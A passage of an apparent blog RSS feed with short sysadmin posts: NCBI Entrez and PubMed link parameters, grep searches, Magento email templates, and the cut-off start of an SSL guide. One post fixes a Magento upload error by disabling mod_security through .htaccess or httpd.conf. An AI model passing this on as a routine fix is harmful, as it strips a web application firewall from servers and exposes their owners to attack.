<p class="text-dec bookmain main">Retrieve by PMID in Abstract:</p>
<p class="text-dec bookmain main"><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed/18276894" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/pubmed/18276894</a></span></p>
<p class="text-dec bookmain main">Retrieve by PMID in MEDLINE text format:</p>
<p class="text-dec bookmain main"><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed/18276894,18276893?report=medline&amp;format=text" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/pubmed/18276894,18276893?<b>report=</b>medline&amp;<b>format=text</b></a></span></p>
</div>
<div class="dft sec" id="linkshelp.Search_PubMed">
<h3>Search PubMed</h3>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main">Search parameters: </p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>term=</b>search terms (<span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/books/bv.fcgi?rid=helppubmed.chapter.pubmedhelp" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">PubMed Help</a></span>)</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>report=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Display_Formats" id="id110725">display format</a></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>dispmax=</b>number of items to display if other than 20</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>tool=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Tool" id="id110747">resource</a></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>email=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Email_Address" id="id110760">address</a></p>
</li>
</ul>
</li>
</ul>
<p class="text-dec bookmain main"><b>Example:</b></p>
<p class="text-dec bookmain main">PubMed antioxidant chocolate citations</p>
<p class="text-dec bookmain main"><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed?term=antioxidant+chocolate" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/pubmed?<b>term=</b>antioxidant+chocolate</a></span></p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main">activating Limits (<span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/books/bv.fcgi?rid=helppubmed.chapter.pubmedhelp" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">PubMed Help</a></span>):</p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>cmd_current=Limits</b></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>pmfilter_</b>filter name <b>=</b> filter value</p>
</li>
</ul>
</li>
<li class="reg">
<p class="text-dec bookmain main">turning off Limits</p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>pubmedfilters=true</b></p>
</li>
</ul>
</li>
</ul>
<p class="text-dec bookmain main"><b>Examples:</b></p>
<p class="text-dec bookmain main"><b>PubMed: </b><br />PubMed hay fever citations published in 2006, display the first 50: <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed?term=hay+fever+AND+2006%5bpdat%5d&amp;dispmax=50" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/pubmed<b>?term=</b>hay+fever+AND+2006[pdat]&amp;<b>dispmax=</b>50</a></span></p>
<p class="text-dec bookmain main">PubMed citations on AZT limited to the AIDS subset: <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed?term=azt&amp;cmd_current=Limits&amp;pmfilter_Subsets=AIDS" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/pubmed?<b>term=</b>azt&amp;<b>cmd_current=Limits</b>&amp;<b>pmfilter_Subsets</b>=AIDS</a></span></p>
<p class="text-dec bookmain main">To turn off PubMed Limits and search for hay fever displayed in the Abstract format:<br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed?term=hay+fever&amp;pubmedfilters=true&amp;report=abstract" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/pubmed?<b>term=</b>hay+fever&amp;<b>pubmedfilters=</b>true&amp;<b>report=</b>abstract</a></span> </p>
</div>
<div class="dft sec" id="linkshelp.PubMed_Feature_Pages">
<h3>PubMed Feature Pages</h3>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main">Advanced: <span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed/advanced" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink"><b>/advanced</b></a></span></p>
</li>
<li class="reg">
<p class="text-dec bookmain main">Clipboard: <span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed/clipboard" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink"><b>/clipboard</b></a></span></p>
</li>
<li class="reg">
<p class="text-dec bookmain main">Details: <span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed/details" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink"><b>/details</b></a></span></p>
</li>
</ul>
</div>
</div>
<div class="dft sec" id="linkshelp.Other_Entrez_Databas">
<h2 class="sec-title">Other Entrez Databases</h2>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Retrieve" id="id148626">retrieve</a> records in HTML or Text format using unique identifiers</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Search" id="id148639">search</a> with terms</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Link" id="id148653">link</a> to related records or neighbors </p>
</li>
</ul>
<div class="dft sec" id="linkshelp.Retrieve">
<h3>Retrieve </h3>
<p class="text-dec bookmain main">Base URL: <span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink"><b>http://www.ncbi.nlm.nih.gov/sites/entrez</b></a></span></p>
<p class="text-dec bookmain main">To retrieve results in <b>HTML</b> or<b> text format</b> use unique identifiers (<span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/query/static/eutils_help.html#PrimaryIDs" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">primary IDs</a></span>). Use <a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Search" id="id148712">Search</a> to retrieve by accession numbers.</p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>HTML</b> retrieval parameters: </p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>cmd=retrieve</b></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>db=</b><span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/eutils/einfo.fcgi?" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">database</a></span></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>list_uids=</b>id,id,id</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>dopt=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Display_Formats" id="id148769">display format</a></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>tool=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Tool" id="id148784">resource</a></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>email=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Email_Address" id="id148798">address</a></p>
</li>
</ul>
</li>
</ul>
<p class="text-dec bookmain main"><b>Example:</b></p>
<p class="text-dec bookmain main">Gene Full Report for GeneIDs 40048 &amp; 847</p>
<p class="text-dec bookmain main"><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?cmd=retrieve&amp;db=gene&amp;list_uids=40048,847&amp;dopt=full_report" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/sites/entrez?<b>cmd=retrieve</b>&amp;db=gene&amp;<b>list_uids=</b>40048,847&amp;<b>dopt=</b>full_report</a></span></p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>text</b> retrieval parameters:</p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>cmd=text</b></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>db=</b><span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/eutils/einfo.fcgi?" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">database</a></span></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>uid=</b>id<b>&amp;uid=</b>id<b>&amp;uid=</b>id</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>dopt=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Display_Formats" id="id148894">display format</a></p>
</li>
</ul>
</li>
</ul>
<p class="text-dec bookmain main"><b>Example:</b></p>
<p class="text-dec bookmain main">Protein sequence records in text format for GIs 9367031, 729567, 586553 <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?cmd=text&amp;db=protein&amp;dopt=genpept&amp;uid=9367031&amp;uid=729567&amp;uid=586553" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/sites/entrez?<b>cmd=text</b>&amp;db=protein&amp;<b>dopt=</b>genpept&amp;<b>uid=</b>9367031&amp;<b>uid=</b>729567&amp;<b>uid=</b>586553</a></span></p>
</div>
<div class="dft sec" id="linkshelp.Search">
<h3>Search</h3>
<p class="text-dec bookmain main">Use search to create a web link for terms with or without Boolean operators. “Escape” spaces by converting them to plus signs (+), e.g., Biochem Soc Trans should be Biochem+Soc+Trans.</p>
<p class="text-dec bookmain main">You may also use <span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/books/bv.fcgi?rid=helppubmed.section.pubmedhelp.Saving_and_Emailing_#pubmedhelp.Creating_a_URL_to_bo" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">Details</a></span> to generate a search URL.</p>
<p class="text-dec bookmain main">Base URL: <span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink"><b>http://www.ncbi.nlm.nih.gov/sites/entrez</b></a></span></p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main">search parameters: </p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>cmd=search</b></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>db=</b><span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/eutils/einfo.fcgi?" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">database</a></span></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>term=</b>search terms (<span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/books/bv.fcgi?rid=helpentrez.chapter.EntrezHelp" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">Entrez Help</a></span>)</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>doptcmdl=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Display_Formats" id="id149047">display format</a></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>dispmax=</b>number of items to display if other than 20</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>tool=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Tool" id="id149069">resource</a></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>email=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Email_Address" id="id149082">address</a></p>
</li>
</ul>
</li>
</ul>
<p class="text-dec bookmain main"><b>Example</b>:<br />Protein records for AAC72193[accn] in the GenPept display: <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?cmd=search&amp;db=protein&amp;term=AAC72193%5baccn%5d&amp;doptcmdl=GenPept" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/sites/entrez?<b>cmd=search</b>&amp;<b>db=</b>protein&amp;<b>term=</b>AAC72193[accn]&amp;<b>doptcmdl=</b>GenPept</a></span></p>
<p class="text-dec bookmain main">Nucleotide records for COMT sequences in the Brief display: <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?cmd=search&amp;db=nucleotide&amp;term=comt&amp;doptcmdl=brief" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/sites/entrez?<b>cmd=search</b>&amp;<b>db=</b>nucleotide&amp;<b>term=</b>comt&amp;<b>doptcmdl=</b>brief</a></span></p>
<p class="text-dec bookmain main"><b>OMIM</b>:<br />OMIM records for the FBN1 gene in the Detailed display: <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?cmd=search&amp;db=omim&amp;term=fbn1%5Bgene%5D&amp;doptcmdl=detailed" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/sites/entrez?<b>cmd=search</b>&amp;<b>db=</b>omim&amp;<b>term=</b>fbn1[gene]&amp;<b>doptcmdl=</b>detailed</a></span></p>
</div>
<div class="dft sec" id="linkshelp.Link">
<h3>Link</h3>
<p class="text-dec bookmain main">Display the related records (neighbors) or Entrez links for records using the unique identifiers (<span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/query/static/eutils_help.html#PrimaryIDs" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">primary IDs</a></span>), you may not use accession numbers.</p>
<p class="text-dec bookmain main">Base URL: <span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink"><b>http://www.ncbi.nlm.nih.gov/sites/entrez</b></a></span><b>?</b></p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main">link parameters:</p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>dbFrom=</b><span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/eutils/einfo.fcgi?" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">database</a></span> searched (URL parameter is case sensitive)</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>db=</b><span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/eutils/einfo.fcgi?" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">database</a></span> to retrieve links</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>from_uid=</b>id</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>tool=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Tool" id="id149293">resource</a></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>email=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Email_Address" id="id149307">address</a></p>
</li>
</ul>
</li>
</ul>
<p class="text-dec bookmain main"><b>Examples</b>:</p>
<p class="text-dec bookmain main">Related Article citations for PubMed PMID 10495220: <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?cmd=link&amp;db=pubmed&amp;dbFrom=pubmed&amp;from_uid=10495220" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/sites/entrez?<b>cmd=link</b>&amp;<b>db=</b>pubmed&amp;<b>dbFrom=</b>pubmed&amp;<b>from_uid=</b>10495220</a></span></p>
<p class="text-dec bookmain main">Nucleotide links from PubMed PMID 10492167: <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?cmd=link&amp;db=nucleotide&amp;dbFrom=pubmed&amp;from_uid=10492167" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/sites/entrez?<b>cmd=link</b>&amp;<b>db=nucleotide</b>&amp;<b>dbFrom=</b>pubmed&amp;<b>from_uid=</b>10492167</a></span></p>
<p class="text-dec bookmain main">PubMed links from Nucleotide GI 47717105: <br /><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/sites/entrez?cmd=link&amp;db=pubmed&amp;dbFrom=nucleotide&amp;from_uid=47717105" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">http://www.ncbi.nlm.nih.gov/sites/entrez?<b>cmd=link</b>&amp;<b>db=</b>pubmed&amp;<b>dbFrom=</b>nucleotide&amp;<b>from_uid=</b>47717105</a></span></p>
</div>
<div class="dft sec" id="linkshelp.Tool">
<h3>Tool</h3>
<p class="text-dec bookmain main">A string with no internal spaces that identifies the resource that is using Entrez links. This argument is used to help NCBI provide better service to third parties generating Entrez queries from programs. As with any query system, it is sometimes possible to ask the same question different ways, with different effects on performance. NCBI requests that developers sending batch requests include a constant &#8216;tool&#8217; argument for all requests using the utilities.</p>
<p class="text-dec bookmain main"><b>Example: tool=</b>resource</p>
</div>
<div class="dft sec" id="linkshelp.Email_Address">
<h3>Email Address</h3>
<p class="text-dec bookmain main">If you choose to provide an email address we will use it to contact you if there are problems with your queries or if we are changing software interfaces that might specifically affect your requests. If you choose not to include an email address you can sign up for <span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/query/static/eutils_help.html#AnnouncementMailingL" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">utilities-announce</a></span> to receive general announcements.</p>
<p class="text-dec bookmain main"><b>Example:  email=</b>name@institution.org</p>
</div>
</div>
<h2 class="sec-title">Display Formats</h2>
<p class="text-dec bookmain main"><b>Display Formats for Sample Entrez Databases</b></p>
<p class="text-dec bookmain main"><b>Note</b>: Scripts/programs that import XML should use <span class="ext-reflink"><a href="http://eutils.ncbi.nlm.nih.gov/entrez/query/static/eutils_help.html" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">E-Utilities.</a></span></p>
<table class="rendered">
<tbody>
<tr class="odd first-row">
<td class="first-column" align="center" valign="middle"><b>Database&nbsp;</b></td>
<td align="center" valign="middle"><b>Display Format </b></td>
<td class="last-column" align="center" valign="middle"></td>
</tr>
<tr class="even">
<td class="first-column" align="left" valign="middle"><span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/books/bv.fcgi?rid=helppubmed.table.pubmedhelp.T40" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">PubMed</a></span></td>
<td align="left" valign="middle">DocSum, Abstract, MEDLINE, XML</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
<tr class="odd">
<td class="first-column" align="left" valign="middle">Nucleotide</td>
<td align="left" valign="middle">DocSum, Brief, GenBank, ASN1, FASTA, ExternalLink, XML, Graph, fasta_xml, gbc_xml</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
<tr class="even">
<td class="first-column" align="left" valign="middle">OMIM</td>
<td align="left" valign="middle">Detailed, Synopsis, Variants, ASN1, XML, ExternalLink&nbsp;</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
<tr class="odd">
<td class="first-column" align="left" valign="middle">Gene</td>
<td align="left" valign="middle">DocSum, Full_Report, ASN1, XML, Gene_Table, ExternalLink</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
<tr class="even">
<td class="first-column" align="left" valign="middle">Protein</td>
<td align="left" valign="middle">DocSum, Brief, GenPept, ASN1, FASTA, ExternalLink, XML, graph, fasta_xml, gpc_xml</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
<tr class="odd">
<td class="first-column" align="left" valign="middle">Genome</td>
<td align="left" valign="middle">DocSum, Brief, ASN1, ExternalLink, XML, Protein Table, cDNA FASTA, Protein FASTA, Structural RNA Table, Contig Table</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
<tr class="even">
<td class="first-column" align="left" valign="middle">Structure</td>
<td align="left" valign="middle">DocSum, Brief</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
<tr class="odd">
<td class="first-column" align="left" valign="middle">PopSet</td>
<td align="left" valign="middle">DocSum, Brief, ASN1, ExternalLink</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
<tr class="even last-row">
<td class="first-column" align="left" valign="middle">Taxonomy</td>
<td align="left" valign="middle">DocSum, Brief, TxUidList, TxInfo, TxTree, ExternalLink, XML</td>
<td class="last-column" align="left" valign="top"></td>
</tr>
</tbody>
</table>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" alt="" src="http://img.zemanta.com/pixy.gif?x-id=be2b5c9f-4830-81b1-b00d-7f861eebb3fd" /></div>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/web-link-to-ncbi-entrez-databases/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to solve “method not implemented” in Magento backend</title>
		<link>http://www.my-whiteboard.com/how-to-solve-method-not-implemented-in-magento-backend/</link>
		<comments>http://www.my-whiteboard.com/how-to-solve-method-not-implemented-in-magento-backend/#comments</comments>
		<pubDate>Fri, 01 Jan 2010 17:16:57 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Linux Admin]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=440</guid>
		<description><![CDATA[If you get &#8220;method not implemented&#8221; error&#160; message, it is most likely your httpd server is using mod_security. You can completely remove mod_security from your site or your httpd server.
To remove mod_security from your site, edit .htaccess file:add these lines:
&#60;IfModule mod_security.c&#62;############################################ disable POST processing to not break multiple image upload
&#160;&#160;&#160; SecFilterEngine Off&#160;&#160;&#160; SecFilterScanPOST Off&#60;/IfModule&#62;
&#60;IfModule mod_deflate.c&#62;
If [...]]]></description>
			<content:encoded><![CDATA[<p>If you get &#8220;method not implemented&#8221; error&nbsp; message, it is most likely your httpd server is using mod_security. You can completely remove mod_security from your site or your httpd server.</p>
<p>To remove mod_security from your site, edit .htaccess file:<br /><span style="font-family: arial;">add these lines:</span><br />
<blockquote><span style="font-family: arial;"></span>&lt;IfModule mod_security.c&gt;<br />###########################################<br /># disable POST processing to not break multiple image upload</p>
<p>&nbsp;&nbsp;&nbsp; SecFilterEngine Off<br />&nbsp;&nbsp;&nbsp; SecFilterScanPOST Off<br />&lt;/IfModule&gt;</p>
<p>&lt;IfModule mod_deflate.c&gt;</p></blockquote>
<p>If this does not work, remove  mod_security from your httpd.conf by commenting out the following lines:</p>
<blockquote><p><span style="font-family: arial;"><span style="font-family: courier new;">AddModule mod_security.c</span></span><br /><span style="font-family: arial;"><span style="font-family: courier new;">LoadModule security_module modules/mod_security.so</span></span><br /><span style="font-family: arial;"><span style="font-family: courier new;">Include “/usr/local/apache/conf/modsec.conf”</span></span></p></blockquote>
<p>&nbsp;Or move mod_security.conf from conf.d directory to somewhere else.</p>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" alt="" src="http://img.zemanta.com/pixy.gif?x-id=f8521f2f-26c6-81d9-81b3-98b376fa40b4" /></div>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/how-to-solve-method-not-implemented-in-magento-backend/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Search files containing a particular text string (keywords) in Linux (Ubuntu)</title>
		<link>http://www.my-whiteboard.com/search-files-containing-a-particular-text-string-keywords-in-linux-ubuntu/</link>
		<comments>http://www.my-whiteboard.com/search-files-containing-a-particular-text-string-keywords-in-linux-ubuntu/#comments</comments>
		<pubDate>Wed, 30 Dec 2009 17:19:14 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Linux Admin]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=439</guid>
		<description><![CDATA[Search for "Ski resort" in a directory and sub-directory
$ grep -H -r "Ski resort" /home/innovita
Search "Ski resort" in a current directory and sub-directory

$ grep -H -r "Ski resort" .


]]></description>
			<content:encoded><![CDATA[<p><code>Search for "Ski resort" in a directory and sub-directory<br /></code><br />
<blockquote><code>$ grep -H -r "Ski resort" /home/innovita</code><br /><code></code></p></blockquote>
<p><code><br />Search </code><code>"Ski resort" in a current directory and sub-directory</p>
<p></code><br />
<blockquote><code>$ grep -H -r "Ski resort" .</code></p></blockquote>
<p>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" alt="" src="http://img.zemanta.com/pixy.gif?x-id=70e60a89-c416-89be-979a-24172bc398cb" /></div>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/search-files-containing-a-particular-text-string-keywords-in-linux-ubuntu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Where to Find Magento Email Template files, How to edit Email Templates</title>
		<link>http://www.my-whiteboard.com/where-to-find-magento-email-template-files-how-to-edit-email-templates/</link>
		<comments>http://www.my-whiteboard.com/where-to-find-magento-email-template-files-how-to-edit-email-templates/#comments</comments>
		<pubDate>Wed, 30 Dec 2009 04:25:34 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Linux Admin]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=438</guid>
		<description><![CDATA[All template files are located in
app/locale/en_US/template/email.
1, Upload a new logo to
images/logo_email.gif
2, Change any file with *new.html
alt=&#8221;Magento&#8221; &#8211;&#62; alt=&#8221;InnoVita&#8221; 
3, Change any file with confirmation.html
&#160;Demo Store &#8211;&#62;&#160; InnoVita
4, Change email and phone number
&#160;dummyemail@magentocommerce.com &#8211;&#62;me@my.commagento@varien.com &#8211;&#62;me@my.com(555) 555-0123
5, To make sure you have changed everything&#160;
cd&#160; /home/xxx/webapps/app/locale/en_US/template/emailcat *.html &#124;grep Democat *.html &#124;grep 555cat *.html &#124;grep magento
cd salescat *.html &#124;grep [...]]]></description>
			<content:encoded><![CDATA[<p>All template files are located in<br />
<blockquote>app/locale/en_US/template/email.</p></blockquote>
<p>1, Upload a new logo to<br />
<blockquote>images/logo_email.gif</p></blockquote>
<p>2, Change any file with *new.html<br />
<blockquote>alt=&#8221;Magento&#8221; &#8211;&gt; alt=&#8221;InnoVita&#8221; </p></blockquote>
<p>3, Change any file with confirmation.html<br />
<blockquote>&nbsp;Demo Store &#8211;&gt;&nbsp; InnoVita</p></blockquote>
<p>4, Change email and phone number<br />
<blockquote>&nbsp;dummyemail@magentocommerce.com &#8211;&gt;me@my.com<br />magento@varien.com &#8211;&gt;me@my.com<br />(555) 555-0123</p></blockquote>
<p>5, To make sure you have changed everything<br />&nbsp;<br />
<blockquote>cd&nbsp; /home/xxx/webapps/app/locale/en_US/template/email<br />cat *.html |grep Demo<br />cat *.html |grep 555<br />cat *.html |grep magento</p></blockquote>
<blockquote><p>cd sales<br />cat *.html |grep Demo<br />cat *.html |grep 555<br />cat *.html |grep magento</p></blockquote>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" alt="" src="http://img.zemanta.com/pixy.gif?x-id=a44ef924-504f-8d3a-baf0-e1e9e569c461" /></div>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/where-to-find-magento-email-template-files-how-to-edit-email-templates/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Generate Self-signed SSL Certificate from GoDaddy for your web server</title>
		<link>http://www.my-whiteboard.com/how-to-generate-self-signed-ssl-certificate-from-godaddy-for-your-web-server/</link>
		<comments>http://www.my-whiteboard.com/how-to-generate-self-signed-ssl-certificate-from-godaddy-for-your-web-server/#comments</comments>
		<pubDate>Mon, 28 Dec 2009 16:40:50 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Linux Admin]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=437</guid>
		<description><![CDATA[1, Login to your server and issue these commands:
 openssl genrsa -des3 -out innovita.key 2048 openssl req -new -key innovita.key -out innovita.csr
